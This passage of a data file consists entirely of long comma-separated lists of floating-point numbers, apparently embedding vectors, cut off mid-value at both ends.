015217878,-0.04571064,-0.012771277,-0.013485158,0.01089181,0.026510745,-0.003118717,-0.030904371,0.0035971247,0.0052601243,-0.013407798,0.0017452141,0.01967586,-0.0134622445,-0.023640733,0.0057220417,0.013542552,0.018665202,0.00554772,-0.0190105,0.0056521012,-0.00537276,-0.026726266,0.018350316,-0.0004206977,-0.013528247,-0.0051971087,0.009695817,-0.0010630807,0.0066743656,0.0058307163,-0.004544854,-0.020436242,0.023869772,-0.0059823184,-0.018022329,-0.031495214,0.0070742993,0.01567221,-0.014177095,-0.0069964845,-0.0013636578,-0.033234835,0.0026712934,0.0053819134,-0.0033199291,-0.010664493,-0.01906942,0.0025344214,0.03283464,-0.0010688385,0.015521215,0.03185151,0.0029547382,-0.0105727,0.005845284,-0.0056279236,0.0015628611,0.0049792994,0.009375484,-0.022568334,0.00100919,0.0044337413,-0.00010467092,-0.009706381,-0.013792761,0.02047002,0.012570955,0.0008380963,-0.0073925145,-0.026001427,-0.025291542,0.0027664232,0.03214139,-0.012328177,-0.0026591371,0.0121081015,-0.00060059107,0.019624084,0.012443216,0.0070824875,0.0048277136,-0.01333792,0.020952413,0.024131712,-0.008241868,0.020045195,-0.012022947,0.010767518,-0.026014386,0.013908565,0.024256978,0.004941549,0.009472061,-0.008371336,0.017301608,-0.02186148,0.009246415,-0.032331903,0.006070164,0.020331167,-0.012649978,0.016473453,0.020609697,0.0075500687,-0.008627874,-0.01946588,0.00976758,-0.008942451,0.0058459863,0.014575516,-0.013113685,-0.00074955105,-0.013207095,-0.060514852,-0.008592822,0.116192445,0.011217011,0.0033627807,-0.0073083933,0.0055849147,0.013382447,-0.13551696,-0.01427548,-0.0019805015,0.008179103,-0.028341657,-0.016001135,0.014768724,0.02177429,0.0120037235,0.012851604,0.0062725893,-0.016600672,0.00040426815,-0.0076010027,-0.014987078,0.0069094854,-0.000063237276,0.014612925,-0.010965485,-0.012465256,0.029100457,-0.012055614,-0.024749115,-0.023683278,-0.0025345983,0.004533753,0.011857299,-0.00283473,-0.0059391526,0.01648607,0.029224902,0.015639443,-0.045833834,-0.012457483,0.022486167,0.002445858,-0.027810186,-0.0311737,-0.117796056,0.004694907,-0.028004114,-0.025552677,0.015914226,-0.026496215,-0.019046133,-0.00717412,0.0014071005,-0.018131783,0.018355917,0.021773333,0.0067833154,0.000938173,0.000968807,-0.013577457,0.009902662,-0.0023927046,-0.010600024,0.02259986,0.022185003,-0.029824113,0.0026970583,-0.01571972,-0.016108966,0.017279372,0.014088044,0.012159894,0.015129314,0.010593954,-0.006719577,0.020900028,-0.032481954,-0.0144716995,-0.0035107923,-0.0028840816,0.00071874354,-0.02355295,0.0038948471,0.012892133,0.0038440053,0.011325417,-0.004789688,-0.009667088,-0.008458677,-0.006581907,0.039946023,-0.015157958,-0.012420722,0.023699502,0.0001812969,0.021114659,-0.0016785106,0.015705286,-0.016233893,0.0059994,-0.0046981317,-0.010547195,-0.0013462293,0.014559356,-0.008131148,-0.0075713634,-0.010828445,-0.004231169,0.027960354,-0.016512642,0.0091871265,-0.03741844,0.015855286,-0.0066660647,0.0019232826,-0.020791464,-0.001955465,-0.01592344,0.0012588891,0.009063299,-0.011221228,0.010048244,0.005866858,-0.016620453,0.029579159,0.0009302791,-0.021347854,-0.019129086,0.0042726453,0.00028803488,0.021099271,-0.007978231,0.0075916993,0.012609351,0.014192381,0.0124134645,-0.009939908,-0.014482077,0.031615373,0.00086161855,0.03054454,-0.01969016,-0.034868486,-0.0029396308,0.0074097947,-0.0238813,-0.0054695266,0.01648014,-0.0137928445,0.014468983,-0.00905512,-0.018992756,-0.0033823904,0.00077891967,-0.024855273,-0.022927172,0.043837927,0.005405434,-0.012114695,0.005699428,0.0006447513,0.006852351,-0.0036348198,-0.020977754,-0.026397819,0.009579116,-0.017295279,-0.0060661277,0.0316835,0.008570638,-0.024058651,0.0051036896,-0.018161291,0.034060355,-0.0022632666,0.02579268,-0.006519761,0.02382179,-0.0003729963,-0.00046446023,-0.011157069,-0.0008359432,-0.0121206995,-0.02415856,-0.0056822514,-0.005313089,0.0005584601,-0.0071026036,-0.008841037,-0.011722959,0.024020262,0.0039744237,-0.002593868,-0.015297427,0.01789999,-0.002942899,-0.010597885,-0.00039161043,0.025615713,0.0502418,-0.004076077,-0.023123918,0.023716547,-0.0011987882,-0.0085095735,0.027513975,-0.019898206,-0.01835156,-0.0027661303,-0.02069193,0.019268785,0.0048872186,-0.0034271781,-0.021346008,0.03602353,0.015641218,0.012880945,-0.02352674,0.025900869,0.007075618,-0.004763133,-0.00559091,0.010010518,0.01348601,0.0061740302,-0.0037626321,0.004881278,-0.0029957006,-0.010184241,-0.01975981,-0.008162385,-0.007373772,0.007646337,0.01381906,-0.049383536,-0.015146673,-0.009859661,-0.0054481,0.0016370659,-0.001122921,0.009318464,0.00081595645,-0.028263804,-0.0022473275,-0.014071777,0.0032638677,0.024759194,-0.0025836022,-0.019933006,0.0040081586,0.013094665,0.0058133276,-0.0074516926,-0.010731016,-0.019957736,-0.012786624,-0.012339324,0.032460947,-0.029645696,-0.011660751,-0.00587099,-0.016085735,-0.009297097,-0.0042031496,-0.0026601565,0.011835186,0.011678999,-0.0052340515,0.0012077064,0.0145161245,0.013918028,-0.013541841,0.012037007,0.021113412,-0.008861832,-0.016804092,0.012668026,0.011674017,-0.0012474639,0.026836786,0.02578211,0.0031439872,-0.0067959507,-0.025190962,-0.008870922,-0.008151577,0.0139391655,-0.0033638508,0.0033480749,0.002611222,0.0003814444,0.05836686,0.0070458404,0.009220721,0.010509076,0.018424284,0.010498657,0.009143044,-0.013667098,0.016982585,0.0021899997,-0.023738598,-0.0026725496,0.002538196,-0.019283518,-0.005270469,0.012748626,0.004392041,0.010721335,0.002220513,-0.0031404358,0.0128903305,-0.04061391,0.006932281,0.02140616,-0.01240796,-0.023223842,0.026433,-0.0020953892,-0.0054749073,-0.009113483,-0.01632362,0.01188346,0.020543262,-0.013632864,0.002961875,0.020812415,-0.029387366,-0.0065205405,0.010388141,0.012077949,0.021583784,-0.020428007,-0.0058704084,0.01944671,0.02448784,0.00657382,0.01205881,-0.012278749,-0.014160673,-0.0007983265,0.011532549,0.002580095,0.008764763,0.010784256,0.028245457,-0.041514616,-0.010790138,0.033128545,-0.022977542,-0.010531822,-0.0014887052,-0.009724773,0.013087906,0.017063346,-0.001297768,-0.030702459,-0.037383545,-0.026402945,-0.008828185,0.013967963,0.0061427364,-0.040448714,-0.011502347,0.01557196,0.03780976,0.003323781,-0.002769468,0.002886517,-0.0076451628,-0.034315664,-0.014947921,-0.019278971,0.0038400213,-0.0027522196,0.010204138,0.035548944,-0.0041626794,-0.033321,0.0048514237,0.011296093,0.02256693,0.012861593,0.013852759,0.0028072395,0.008273994,0.025088191,-0.034102473,-0.014361879,0.029169476,0.01030331,-0.028260669,-0.004015516,-0.02792123,-0.020066703,-0.0059197214,-0.01205716,-0.009018988,0.0047876174,0.022667745,-0.012297018,-0.023330944,-0.036889277,0.023546683,0.0053975554,0.0064292513,-0.0141701605,-0.0031196512,0.007089365,-0.01635656,0.0005462459,-0.008457964,-0.0105520915,-0.013203084,0.0007376626,-0.0076498576,0.021602899,0.010212311,-0.042383347,-0.0133155715,0.024114057,-0.02048299,-0.000453515,-0.018673772,-0.0048773326,-0.004032789,0.021226676,-0.023771519,0.009506292,0.0023325284,0.027903656,0.022431146,0.004593827,0.009874909,-0.012103528,-0.0273454,-0.022626873,-0.008586787,0.013055915,-0.016200116,-0.040027868,-0.019057127,0.025880238,0.002630794,0.00009113641,0.0026822519,0.009236141,-0.006898123,0.013085584,-0.015907338,-0.023318702,-0.016795244,0.019493036,0.005645029,-0.019956553,-0.0237812,0.0003857355,-0.011341388,-0.01668283,-0.010747085,0.0011831216,-0.013065985,0.0070255087,0.0017022233,-0.00059617456,0.015955059,0.035988666,0.008290141,-0.0020086952,-0.004159892,0.013797837,0.012864585,-0.010988057,0.008018838,-0.02398969,0.0054739444,0.007875427,0.0066595506,-0.0014136193,0.031042075,-0.009208899,0.007279387,-0.001506572,-0.02226482,-0.017789993,0.0059586493,0.00873468,-0.000009172076,-0.016967462,-0.018190257,0.015329616,-0.00030941473,-0.0039730216,-0.022883207,0.002383027,0.008278037,-0.0066598523,-0.0033458876,-0.009068406,0.003954431,0.0004861853,0.011057675,0.030057522,0.0062208883,-0.016151844,0.015327347,0.020819347,-0.0072178277,0.002845075,-0.0069477456,0.00851329,0.015554656,-0.007375822,-0.011001893,-0.0015660953,-0.014541833,0.01374728,-0.0189717,0.019125123,-0.011048674,0.0020068737,0.008036813,-0.014819109,0.0025313515,0.004064736,-0.04201923,-0.002569761,-0.0014261792,-0.010190383,0.0044060103,-0.028663214,0.006727871,-0.19200464,-0.0045020157,-0.02561885,-0.000062589315,-0.012115669,-0.0055322475,0.025959434,0.002612953,0.0117697595,0.020638883,-0.009734563,0.033832505,0.003001566,0.028969837,0.022010501,0.0019368391,-0.008644097,0.009036695,-0.0019620778,-0.0030785638,0.018380912,-0.00010185609,0.0071883616,-0.012910173,0.013243477,0.0027408719,0.010332024,0.038656406,-0.020644484,-0.0021719276,0.0085521275,0.018960914,0.008850511,0.0061474675,-0.0061681718,0.008718862,0.0014044587,0.013400078,-0.02455682,0.015189805,-0.014234328,0.0010365949,-0.031128477,-0.0032013538,-0.008766527,-0.010588921,0.010170482,0.02549815,0.011513801,0.0086102355,-0.035823125,0.01356424,0.00066455646,-0.0020541337,0.010987003,-0.016117143,0.012124552,0.0070525794,0.013845363,0.000055860517,0.0061254655,-0.025125835,-0.012325874,-0.0070846784,0.011195655,0.002967869,-0.0021672398,-0.024131367,-0.0055184173,-0.00085503544,-0.0028169202,0.024727108,-0.013119471,0.009496375,-0.030707173,0.010913985,0.015743693,0.0023345524,-0.0147981625,0.033989284,-0.029812345,-0.028881337,-0.0023091952,0.000849758,-0.014762445,-0.0031850035,0.0035992037,0.0126090655,-0.00062801095,-0.00437567,0.025911545,0.0017660977,-0.0070867892,-0.02468066,-0.0008899087,0.019365435,-0.028773777,0.0049263416,-0.016740378,-0.006370112,-0.016419234,-0.024134036,-0.0023913316,0.0035204205,-0.10851967,-0.0077252435,-0.0030224933,0.016924316,-0.0031858718,-0.017327663,0.037487842,0.008734953,0.04692568,-0.03189905,0.014701388,-0.005087297,-0.013333164,0.0044772737,0.0069922055,0.005822836,-0.020209383,0.0178509,0.007825686,-0.0070262817,0.007016635,-0.0059128907,-0.0043090805,0.03515074,0.0050124377,0.036907125,0.023013981,0.05023002,0.009350484,0.021818288,0.009576361,0.0056029283,-0.006645738,-0.015676955,-0.054094568,-0.016316261,0.015900875,0.006893771,-0.0068937466,0.012820232,-0.0059145666,-0.010454068,0.012760382,0.024442738,-0.0062132375,-0.015490066,-0.008154575,0.0016064931,0.00066524727,-0.0011446606,-0.028244829,-0.0061133397,-0.0039554792,-0.008427112,0.007284049,-0.0049488936,-0.0067484817,-0.015414854,0.0019789457,-0.008366575,-0.02013624,0.005780633,-0.00050978496,0.004332729,0.014895238,0.004262337,-0.016533636,0.00022878376,-0.0018421726,0.0109444,-0.0065187765,0.024990123,0.0067913746,-0.0038431797,0.018000163,0.0049994187,0.016242534,0.01804204,0.033190455,0.001360356,0.013969756,0.017747441,-0.009764302,0.010005653,-0.02460836,0.016001346,0.0013224147,-0.015570522,-0.010240806,0.0033777151,-0.00620073,0.010445404,0.01712064,0.030497642,0.021986159,-0.011534801,0.021761488,0.0022856325,-0.013962769,-0.014936277,-0.0045219027,-0.0032649217,0.0004590111,0.027222117,-0.0074893325,0.012323192,0.0068226825,0.0060306042,0.0017414668,-0.0062251054,0.0012335781,0.024828257,-0.000780351,0.011475748,0.0045569804,-0.024164947,-0.002666832,0.017453335,0.005050979,-0.0077497163,0.041123744,-0.009056931,0.00046464134,-0.0073646624,-0.017212141,-0.016677184,0.020206826,0.012342425,0.030566119,-0.024993066,0.004254298,-0.01775552,0.024351042,-0.0019293813,0.009996808,0.027312022,-0.009091339,0.022512235,0.037814055,-0.013768038,0.008871697,0.0105512915,0.00036903666,-0.016478088,-0.008398857,-0.0031720027,0.00069995516,-0.009392083,-0.012698577,-0.01004576,0.0001098727,0.03502852,0.027392147,0.0007974537,0.017608302,0.008946478,0.006683954,0.015936142,0.018096147,-0.012299784,-0.017514342,0.0011696141,0.017857177,-0.0026946936,-0.019690331,0.009331318,-0.013869458,-0.009615081,-0.0145567,0.015073927,-0.0024454917,-0.004373745,-0.0014996709,-0.030346794,0.0028603598,-0.0038782516,0.019226925,0.01002319,0.006701924,0.024907757,-0.015098351,-0.007354014,-0.001999809,-0.016109334,-0.000299844,0.009909859,0.005408274,-0.015443209,-0.015420891,-0.020576209,0.039086778,-0.0004190685,-0.015424567,-0.018449413,0.0069647334,-0.020812428,0.006694081,0.017008048,0.008960597,0.0013324153,-0.02042609,0.0091790175,0.011233956,0.013191273,0.0031015882,0.010695778,0.0043792077,0.04853331,0.004762944,-0.0067103077,-0.0032490327,0.027909024,-0.0155744525,-0.006538421,0.030826816,0.013977217,0.021088144,-0.036039896,0.029653152,-0.007934109,0.007658047,-0.01590643,-0.006367427,0.009277028,0.008527715,0.002991296,-0.0023971987,0.03696867,-0.02348575,-0.015776085,0.018528113,-0.0006961206,-0.019521898,-0.01636153,0.014645952,-0.00055672275,0.03397031,0.017367335,0.009913019,0.0060889865,0.023418423,0.02909284,0.015224746,-0.005168363,-0.007845606,-0.002197091,0.027068121,0.001148745,-0.0045371903,0.014035256,0.0054587615,0.00912756,-0.009634732,-0.016453153,-0.014037828,-0.003844249,0.011978622,0.014260141,-0.00790846,-0.007112961,-0.0142789455,-0.0006649898,-0.005758928,-0.009851463,0.011012522,0.013657881,-0.01559748,-0.010655171,0.010302217,0.005977662,0.016882788,0.0069563785,-0.023164375,0.00795845,-0.031175708,-0.00641092,0.025059419,0.03216473,-0.0093839085,0.008640566,0.0225778,-0.014255437,0.010145783,0.02030567,0.01660398,0.005598634,0.015495425,-0.006958193,-0.005680006,0.0043942416,-0.0022054045,0.009510395,-0.021062726,-0.0034789238,-0.0034842277,0.01593922,0.0075380066,0.0034948133,0.010010089,-0.004776695,-0.003653161,0.0059813634,-0.0011370628,-0.018144483,0.013074373,0.021794006,0.0015745624,0.02765549,0.020414658,0.007778889,0.0057890364,0.021177953,-0.012640282,0.0038891193,0.0063831424,0.0062284195,0.0019227666,0.0057767956,-0.036920995,-0.019536015,0.0023185285,0.0031886662,0.027052157,-0.020732129,0.012010674,0.0013082825,0.004831845,0.054347638,-0.00938765,-0.0018127303,0.015086268,-0.07507657,-0.01681533,0.010220157,0.019522002,0.012774065,0.028454898,0.022251038,0.008024925,0.00049696723,-0.0046006455,0.009680902,0.0019012848,-0.01152146,-0.026249524,0.01622804,-0.0035174363,-0.0019847227,0.00077242224,0.0038953093,-0.00597373,-0.0031498433,0.010391624,0.0075398935,-0.009359574,0.025014432,-0.038060095,-0.0052637793,-0.012966032,0.023117749,-0.024732053,0.008163628,-0.0031482724,-0.016482072,-0.011533517,-0.007972949,-0.020656817,0.010910313,-0.007505468,0.0071957367,-0.015603141,-0.0003990724,-0.029805137,-0.009621863,0.017111365,-0.06029235,-0.008659366,-0.0071277884,0.026131831,0.020288808,-0.0043724678,0.00898811,-0.0051917704,0.006644617,0.005842169,-0.0025491884,-0.00075100077,-0.035411295,-0.00017390677,0.015738724,-0.021404412,-0.01664066,0.0088307345,-0.033106294,-0.015669702,-0.011805448,-0.013933914,-0.0074584694,-0.029634954,0.01430741,0.010747774,-0.010550608,-0.015314891,0.025123307,-0.0007135327,-0.0066250116,-0.005710378,-0.020302512,-0.0076279626,-0.0192552,0.017569942,-0.019307978,0.026618546,-0.02996986,-0.0014498277,-0.027130602,-0.008199778,0.01302201,0.0100325,-0.016358187,0.0101919435,-0.0068301857,0.016610896,-0.014569075,-0.016487302,0.003992147,0.0019888165,-0.0013654565,-0.028633764,-0.0029130834,0.0049022087,-0.0058006537,-0.021874618,0.011084017,0.0064239004,-0.012090635,-0.0010354198,0.010302924,0.015083268,-0.0074921246,0.01696669,0.0050120116,-0.00395637,0.002302164,0.0037605078,-0.007322838,-0.01939385,-0.012813738,0.003138462,-0.019856604,-0.0031751294,0.009817716,-0.01913968,-0.0095197,-0.00028480543,0.045283966,-0.021085171,0.05007075,0.033611275,-0.005082242,-0.001993605,0.0030856135,0.005609078,0.0044470564,0.0055433577,-0.011955785,0.0020125255,0.029525312,0.022104483,0.010448582,0.0060581183,-0.006238762,-0.0003298114,0.015370473,0.0152093405,0.0065194834,0.0119816745,-0.005702565,0.017878195,-0.015290705,-0.001973302,0.009287191,-0.0032486229,-0.021024361,-0.017877396,0.010729728,0.025645038,0.009162413,0.025301214,-0.0030426043,0.011222624,-0.0033020289,0.02484148,0.0023988336,0.00112231,-0.017031142,-0.021895602,-0.010491423,0.022504842,-0.004545481,-0.020674543,0.00031264935,0.0033964098,-0.017249994,0.011531209,0.009076013,0.009875575,0.030166486,0.020792032,-0.0036873878,-0.0036342186,-0.012928061,0.022982849,-0.001270487,0.013095502,-0.010002248,0.015577175,0.0050110673,-0.00562848,-0.0066704685,0.026174061,0.001486342,0.002698654,0.0037686974,-0.025204018,0.0022233888,0.0007467423,0.017264932,-0.01067111,0.023755202,-0.017739315,-0.0030440944,-0.017129475,-0.030956315,-0.0057975966,-0.0013652612,0.010677715,0.023787018,0.00087490975,-0.020730883,0.016765993,-0.0044863936,0.011495915,0.0018229412,0.01828286,-0.012950619,-0.003074684,0.012954048,-0.0127849085,-0.028621467,-0.030012567,0.008118041,0.016034096,-0.0030297663,0.01718465,-0.004230484,-0.0051635187,-0.017934365,0.014767675,-0.010138268,-0.010439679,0.0055064815,0.026634168,0.0017565053,-0.011805517,-0.013012341,0.009714819,-0.00803994,-0.008889174,-0.01118243,-0.00008228295,0.01851835,0.016608767,-0.024091009,-0.011818205,-0.02459066,-0.009997237,-0.026274325,-0.013785599,0.043811258,0.00018981406,-0.002489962,0.0011944383,-0.018620508,0.0024680186,-0.004102059,0.012433172,0.02449162,0.10982335,-0.020743059,0.0038657428,-0.010600292,0.010268531,-0.008911463,-0.0028846434,-0.005598835,0.009611035,-0.025591744,0.007452322,-0.030148853,0.011861036,-0.00495067,0.00999067,0.017650282,0.036614083,0.0065091797,0.013041661,0.0195934,0.018011369,-0.03376324,-0.02577691,-0.025122745,-0.019072698,-0.020684158,0.022388054,-0.006812819,-0.009872005,0.03848643,-0.0052415426,-0.017064722,0.0047892006,0.01050774,-0.004054732,-0.0074758115,0.0072620655,-0.012789519,-0.005285214,-0.012124828,0.003979227,0.012203772,0.0075368555,0.00096954784,-0.011801246,-0.036160197,0.011291671,-0.007709569,-0.0019577201,-0.014156818,0.014046924,-0.0018461944,0.0012137142,0.0045782537,-0.013955993,-0.013644739,-0.0131339,0.008923881,-0.006333023,-0.0061935433,-0.0133371595,0.0016784638,0.0013898071,-0.027290393,0.013122734,0.014333909,-0.0018084896,-0.007469824,-0.014318434,0.02107947,0.020566406,-0.0041625346,0.00033360906,0.008361054,0.018787066,0.0038966732,-0.004653291,-0.0116237495,0.005166866,-0.03448558,0.0021435868,-0.0016974383,0.0014248904,-0.006256648,-0.0022034298,0.019137856,-0.027487993,0.01964854,-0.004617625,-0.011397757,-0.015007135,0.02054415,0.03742431,-0.0062312144,-0.013864325,0.008046591,0.04458642,-0.0014021767,-0.0052599884,-0.030335579,-0.022233529,-0.043674387,-0.0034793685,0.012720337,0.0076053753,-0.014502576,0.007689609,0.006815479,-0.043026734,0.03451722,0.009801584,0.048259057,-0.013589815,-0.001776636,-0.00090021343,0.046547618,-0.030287273,-0.0065647447,-0.0027600254,-0.0035012346,-0.0238502,-0.002697514,0.000807404,0.028286615,0.006580664,-0.006405728,0.00096642546,-0.0025079849,0.018277315,-0.00067334005,0.00054562336,-0.028196111,-0.02019673,0.010965415,-0.01114415,-0.014825898,0.036352187,0.0010735352,0.016674398,-0.0023774635,0.019068241,-0.021040894,-0.01086128,-0.010291532,0.014290592,0.0003165229,0.030995158,-0.023846895,-0.008659681,-0.014366744,0.0030708774,-0.00841765,-0.017338125,0.018980524,-0.027933095,-0.004797279,-0.034311034,0.00060204713,-0.006449255,-0.014042617,0.004600432,-0.024911238,0.005328974,-0.045244094,0.002932241,0.0034361575,0.02449704,-0.015216645,0.008241278,-0.008604041,-0.008763277,0.007276007,0.0154304225,-0.001534809,0.022419116,0.0018945864,-0.0037915688,0.047862068,-0.0153970085,-0.013384072,-0.0016414349,0.017009974,0.014159781,-0.017751593,0.037498876,-0.017254228,0.007573681,-0.00079266966,-0.016843243,0.038661476,-0.0050096563,-0.0011106451,0.0029208125,0.014237282,-0.023692653,0.028513249,-0.036272224,0.027505288,-0.022592433,-0.021560095,0.017233184,0.0011644111,0.014348996,-0.010680573,0.0062480946,-0.015011512,-0.0094397,-0.007128901,-0.0021319475,-0.021372912,0.00862115,-0.0030649956,0.00038721508,-0.0010898876,0.027910411,0.020223774,-0.0036360638,-0.013398178,-0.016239488,0.0013974344,0.010041951,0.014346679,-0.023498328,-0.009659107,0.0011278278,-0.00014676411,0.0015143588,0.010321064,0.020670963,0.014780222,-0.022343168,-0.006881927,0.00023764717,0.012791325,-0.0147152925,-0.004858828,0.038673215,0.0036593499,0.00108651,-0.022725856,0.0056635123,0.012356845,0.0011808943,0.011355993,-0.028933877,-0.015244914,0.023312794,-0.01894897,0.027394082,-0.027533613,-0.021396136,-0.0036806597,-0.02756535,-0.0066412035,-0.02976509,-0.004920504,0.012362254,0.012883721,0.008878019,0.0015419803,0.013927534,0.023589026,-0.017044855,0.02515743,-0.0011947277,-0.023726165,0.0039076633,-0.0026542055,0.011973991,0.013903182,-0.031029208,0.01316084,-0.018349223,0.016425323,0.019155081,-0.0064174156,0.005041771,0.0031189981,-0.01781133,-0.0044976547,0.017490115,-0.013467833,-0.005401557,-0.01437889,0.0059590093,0.01224314,-0.019683797,0.010935905,0.042735524,-0.06409205,-0.005924822,0.019026896,-0.01152859,-0.04543262,0.020133946,0.022559885,-0.027734607,0.0034195555,0.000060036444,0.008236626,0.017876342,-0.039306454,-0.0010070258,0.018696552,-0.00855614,-0.0025138557,0.016918667,0.00041704185,-0.013506895,0.03276335,-0.019041356,0.0006738166,-0.003681126,-0.008282192,0.0044248546,0.0032869615,0.005583327,0.015411663,0.018378684,0.012398847,0.03244636,-0.0018321082,0.0049133245,0.005890738,0.0049305833,0.017307919,0.0005982119,-0.005635525,-0.028324917,-0.025635283,-0.013052698,0.0038210645,0.017628405,0.0130278105,-0.0018868786,0.015040925,-0.014667853,0.0713611,-0.008104978,-0.009909245,0.007581211,-0.003325626,-0.02711434,0.0026268438,0.030237338,0.0019779464,0.016356014,0.0089775305,-0.013620204,0.0044901394,0.015254061,-0.004822697,-0.023054652,0.021305686,0.11349062,0.000038565882,0.02462501,0.0043681078,0.008688188,-0.00315616,0.029575085,-0.0071734786,-0.08279153,-0.012121065,-0.045547757,0.025693709,-0.015855623,-0.031028468,0.010853805,0.0070910845,-0.0024381613,-0.020707915,0.016139867,0.0037025954,0.016415993,-0.026367156,-0.01393286,-0.0008365859,0.0067757913,-0.008170926,-0.009926384,-0.017114375,0.02575771,-0.034423016,0.014698149,-0.00096940633,0.019230403,-0.0010412345,-0.011851788,0.002073792,0.0064116134,-0.0032009995,0.005590082,-0.003738873,0.020383295,0.009298586,-0.01522346,-0.0134165045,0.021973953,-0.010341814,0.030453673,-0.0035201937,0.007190995,-0.0056363307,0.00488177,0.003748109,-0.005136735,0.007085926,0.018573945,-0.031630747,-0.010887084,-0.0046392833,-0.011928498,-0.009178665,-0.013601997,-0.0021476564,-0.015907075,-0.00499906,0.02346292,-0.0045989035,0.013189387,0.018383546,0.02144474,-0.0010376167,0.002249488,0.00022184418,-0.035524473,0.00839023,0.012958784,-0.006795609,-0.0011786964,0.019087797,0.007507413,0.014761245,-0.00080020464,-0.01364885,-0.03940335,-0.0038460575,0.015937505,-0.036650732,0.008747793,-0.0027102332,-0.008545287,-0.008704395,-0.033706054,-0.006909581,0.0035207896,-0.0023013954,0.017020399,-0.007347766,0.017035322,0.019829784,-0.013476028,-0.008517143,-0.000006115448,-0.022338832,0.013172858,0.003040828,0.0008359633,0.00078611047,0.0038113045,-0.01917385,-0.0030920703,0.0017067961,0.01158413,0.02685323,-0.012580154,-0.039376777,0.024329556,0.015909815,0.023152268,0.009053916,-0.016783755,0.011108069,-0.0032103339,-0.024657521,-0.031705473,-0.008211106,-0.0050463113,-0.0024105967,0.00032792927,-0.014877653,-0.0014122894,-0.015336676,0.01918529],[-0.014886978,0.020586487,-0.01202717,-0.022898227,-0.006338823,-0.018385055,0.001005169,-0.0026477678,-0.023910446,-0.024652021,0.015168258,0.010639456,-0.0065212147,-0.010531924,-0.030755136,-0.00560605,-0.001986615,0.008752562,0.005589968,-0.014310825,0.005640798,-0.008412564,0.007009577,-0.009677976,0.0027727399,0.011126606,0.0021099846,0.009340031,0.0047600875,0.0073105367,-0.0064099594,0.019514283,0.013656967,0.00093542656,0.0061163255,-0.0030081323,0.0054652356,-0.022078691,-0.0054407455,-0.006843346,0.0033971223,0.0075180167,0.0024055317,0.038045056,-0.022841785,0.00762541,-0.01105557,0.009767238,0.006952599,-0.007391857,0.012525234,-0.005338879,-0.028156871,0.011222298,-0.018236587,0.013245396,-0.0015048049,-0.011287405,0.009568241,-0.010189054,-0.008359371,0.00951606,-0.000809094,-0.021258084,0.00710066,-0.013597469,0.0069519877,-0.027124282,-0.0020816189,-0.012511071,0.0019246561,-0.01218537,0.0072837197,0.003781349,0.007157556,0.014359313,0.00660369,-0.011944117,-0.013687791,0.015380691,0.0067265695,0.006208523,0.00025903943,-0.017037757,0.004566479,-0.008936923,0.004929681,-0.011709324,0.00077556487,-0.045268685,-0.004041057,0.008305481,-0.0021048842,0.0061444617,-0.021802315,0.027028728,0.013748435,-0.024905438,-0.0043181544,0.010587938,0.002743074,-0.006013221,-0.029534932,0.018818432,0.013790704,-0.019700244,0.0066435547,-0.023019662,-0.00014684755,-0.02871097,-0.010659247,-0.00030199072,0.011219335,0.023856912,0.024037108,0.0041855085,-0.010553667,0.0052332077,-0.0018325961,0.014828748,-0.0082943505,0.04003412,0.008157261,0.0029051933,-0.019294148,-0.008864524,-0.022432717,0.018452214,-0.001761096,0.011743572,0.0033954747,0.0082997475,-0.006660903,-0.01827765,-0.029428605,-0.003291087,-0.0009941993,-0.00021572968,0.004441688,0.0017248447,0.005882463,-0.011923707,0.006624675,-0.022558039,0.032895666,0.007984427,0.0030930655,0.017608438,0.021771243,-0.0028595515,0.022738447,0.000089820984,-0.012341215,-0.013426792,-0.009105184,0.011621753,0.0069835135,0.0037256796,-0.031025449,-0.0030132073,-0.015836217,0.01711377,0.015394704,-0.0064200135,-0.013213418,-0.040029008,0.0021411635,-0.011003697,-0.021468077,0.0054641496,0.016161788,0.01182542,0.014985627,-0.014242382,0.018787982,0.044429224,-0.013816639,-0.011536565,0.0067954212,0.008425075,0.010185506,0.013694609,-0.005937352,-0.014372144,0.017492285,0.032617357,0.018730072,0.014172801,-0.025840338,-0.012407432,0.003960999,-0.034127343,-0.018015705,-0.015029311,-0.0019597227,-0.020268489,0.006210972,0.07930479,0.0069332756,0.0035099378,-0.016567748,0.0012055414,0.01909273,-0.03563353,-0.0015167171,0.012142976,0.0020010427,-0.0087773865,0.016542038,-0.008546684,0.019956516,0.012681778,-0.00842187,-0.004602238,0.01308894,-0.08281675,0.027333736,0.029756565,0.010214489,0.012618331,-0.0035749006,0.00096206315,0.0021223847,-0.015604835,-0.0074101356,-0.0072312653,-0.0025068356,-0.0021323247,0.023654986,-0.018547978,0.008974303,0.017316282,-0.018678648,-0.038705103,0.006760253,-0.023345167,0.009132593,0.0036572313,0.008174978,-0.008983374,0.0033591217,0.0016853504,0.028214078,0.03934655,-0.016009703,-0.00611801,0.021058977,0.0026764106,-0.014651654,0.020997673,0.002124557,-0.014585872,-0.005094311,0.011390464,-0.00470009,-0.01725577,-0.016901663,-0.011077599,0.003570956,0.010168826,0.006258317,0.008095683,-0.0067718276,0.016280085,0.008367488,0.0049195495,0.009888386,-0.036108617,-0.0034647589,-0.0050382908,-0.013657429,0.0095134275,0.0011638455,0.006022499,-0.0022689456,0.0007918766,0.02516922,0.00093757745,0.019916488,0.006524553,-0.004304716,-0.0031234506,0.008477618,-0.020239329,0.0014621469,0.013990271,-0.032121792,0.009680184,0.030064285,-0.0041884133,-0.0077864244,-0.0068733767,0.026191022,0.007451815,-0.023484379,-0.010659926,-0.028819475,-0.0029487098,0.0043331226,-0.01747341,-0.0047656903,-0.0125297,0.0043313233,0.0008274455,-0.0020218475,-0.007863901,0.0047769183,0.02667173,-0.014698679,0.011788447,-0.02344312,-0.0026020976,-0.040989082,0.0028767972,-0.014951338,0.0128071895,-0.004083585,-0.008633163,-0.00021493551,0.009815146,0.015172037,-0.01607651,0.018458705,-0.047857117,0.010115467,0.0134978285,-0.0019389463,-0.015899628,0.0020055142,0.006844003,0.002047231,0.0035999666,0.022441005,0.016307902,-0.006931631,0.03029112,-0.007062397,0.015661778,0.016447939,0.0030229662,-0.021264406,-0.010685742,-0.00015823878,0.013172417,-0.0008991174,0.0049748262,-0.010440718,-0.0041340976,0.012489479,0.012718492,0.02178361,-0.000683468,0.0065473984,-0.02641888,-0.015890379,-0.0010584694,-0.006731447,-0.018246165,0.0087932935,-0.025960688,0.030356627,-0.0045517054,-0.014995531,0.012583493,0.0702015,0.0060340827,0.0007759954,0.0036043606,-0.026782826,-0.0050917696,0.0383906,0.010736368,0.009015553,-0.008300567,-0.009919396,-0.025047215,0.012785754,0.006463363,0.0040922896,0.005298413,-0.010691908,-0.028381381,-0.019165874,0.0014293657,0.025022188,-0.0030668